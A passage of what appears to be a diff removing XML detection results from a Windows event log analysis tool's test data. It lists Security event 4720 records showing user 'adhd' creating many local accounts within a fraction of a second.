Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Linda</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4963</recordid>
-            <time>2020-06-11 22:05:05.904823300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.9048233Z'/&gt;&lt;EventRecordID&gt;4963&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Tyler&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1153&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Tyler&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Tyler</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4957</recordid>
-            <time>2020-06-11 22:05:05.817214900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.8172149Z'/&gt;&lt;EventRecordID&gt;4957&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kathryn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1152&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kathryn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kathryn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4951</recordid>
-            <time>2020-06-11 22:05:05.720882800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.7208828Z'/&gt;&lt;EventRecordID&gt;4951&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Andrea&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1151&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Andrea&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Andrea</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4945</recordid>
-            <time>2020-06-11 22:05:05.640094700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.6400947Z'/&gt;&lt;EventRecordID&gt;4945&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Susan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1150&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Susan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Susan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4939</recordid>
-            <time>2020-06-11 22:05:05.557826700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.5578267Z'/&gt;&lt;EventRecordID&gt;4939&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Elizabeth&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1149&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Elizabeth&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Elizabeth</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4933</recordid>
-            <time>2020-06-11 22:05:05.467816600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.4678166Z'/&gt;&lt;EventRecordID&gt;4933&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Melissa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1148&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Melissa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Melissa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4927</recordid>
-            <time>2020-06-11 22:05:05.376550300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.3765503Z'/&gt;&lt;EventRecordID&gt;4927&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Carolyn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1147&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Carolyn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Carolyn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4921</recordid>
-            <time>2020-06-11 22:05:05.294921600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.2949216Z'/&gt;&lt;EventRecordID&gt;4921&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Paul&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1146&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Paul&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Paul</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4915</recordid>
-            <time>2020-06-11 22:05:05.194865700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.1948657Z'/&gt;&lt;EventRecordID&gt;4915&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Doris&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1145&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Doris&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data 